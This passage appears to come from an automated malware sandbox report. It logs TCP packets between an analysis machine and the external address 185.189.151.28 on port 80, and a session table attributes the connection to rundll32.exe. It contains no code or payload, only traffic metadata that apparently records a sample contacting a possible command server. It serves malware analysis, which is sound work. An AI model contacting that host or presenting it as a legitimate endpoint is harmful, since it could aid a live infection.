May 4, 2022 16:20:11.831120014 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831161976 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831170082 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831197977 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831227064 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831255913 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831278086 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831280947 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831283092 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831310987 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831332922 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831358910 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831362963 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831401110 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831423044 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831448078 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831454039 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831456900 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831474066 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831542015 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831545115 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831655025 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831681967 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831698895 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831722021 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831743956 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831747055 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831751108 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831767082 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831790924 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831815004 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831825972 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831829071 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831840038 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831859112 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.831933022 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.831938982 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.834752083 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.834793091 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.834815979 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.834835052 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.834932089 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.834954023 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.837533951 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837584972 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837610006 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837634087 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837657928 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837686062 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837706089 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837730885 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837753057 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.837757111 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837776899 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.837781906 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.837783098 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837801933 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.837816954 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.837996960 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838053942 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838079929 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838100910 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838124037 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838146925 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838165045 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838169098 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838172913 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838195086 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838221073 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838247061 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838254929 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838263035 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838282108 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838305950 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838330984 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838340044 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838346004 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.838350058 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.838937998 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:11.840033054 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.840058088 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:11.840255022 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:12.290322065 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:20:12.307521105 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:12.582592010 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:12.582618952 CEST | 80 | 49773 | 185.189.151.28 | 192.168.2.7 |
May 4, 2022 16:20:12.582794905 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
May 4, 2022 16:21:07.558202982 CEST | 49773 | 80 | 192.168.2.7 | 185.189.151.28 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.7 | 49773 | 185.189.151.28 | 80 | C:\Windows\SysWOW64\rundll32.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
May 4, 2022 16:20:10.851257086 CEST | 1226 | OUT | |
May 4, 2022 16:20:11.145236969 CEST | 1227 | IN |